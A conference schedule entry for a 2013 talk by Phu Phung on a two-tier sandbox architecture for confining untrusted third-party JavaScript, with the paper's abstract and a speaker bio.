Loading…
Wednesday, November 20 • 4:00pm - 4:50pm
Sandboxing JavaScript via Libraries and Wrappers

Sign up or log in to save this to your schedule and see who's attending!

The large majority of websites nowadays embeds third-party JavaScript into their pages, coming from external partners. Ideally, these scripts are benign and come from trusted sources, but over time, these third-party scripts can start to misbehave, or to come under control of an attacker. Unfortunately, the state-of-practice integration techniques for third- party scripts do not impose restrictions on the execution of JavaScript code, allowing such an attacker to perform unwanted actions on behalf of the website owner and/or website visitor.
In this paper, we present a two-tier sandbox architecture to enable a website owner to enforce modular fine- grained security policies for potential untrusted third-party JavaScript code. The architecture contains an outer sand- box that provides strong baseline isolation guarantees with generic, coarse-grained policies and an inner sandbox that enables fine-grained, stateful policy enforcement specific to a particular untrusted application. The two-tier approach ensures that the application-specific policies and untrusted code are by default confined to a basic security policy, with- out imposing restrictions on the expressiveness of the policies.
Our proposed architecture improves upon the state-of-the- art as it does not depend on browser modification nor pre-processing or transformation of untrusted code, and allows the secure enforcement of fine-grained, stateful access control policies. We have developed a prototype implementation on top of a open-source sandbox library in the ECMAScript 5 specification, and validated it with several real-world JavaScript applications such as Google Analytics, Google Maps, and jQuery UI.

Speakers
avatar for Phu Phung

Phu Phung

Research Associate, University of Illinois at Chicago
Dr Phu Phung is a Research Associate at the University of Illinois at Chicago from December 2012, employed by the University of Gothenburg, Sweden. From October, 2011 to December 2012, he was a postdoctoral researcher at Department of Computer Science and Engineering, Chalmers University... Read More →


Wednesday November 20, 2013 4:00pm - 4:50pm
Belasco & Broadhurst (5th Floor) NY Marriott Marquis

Attendees (0)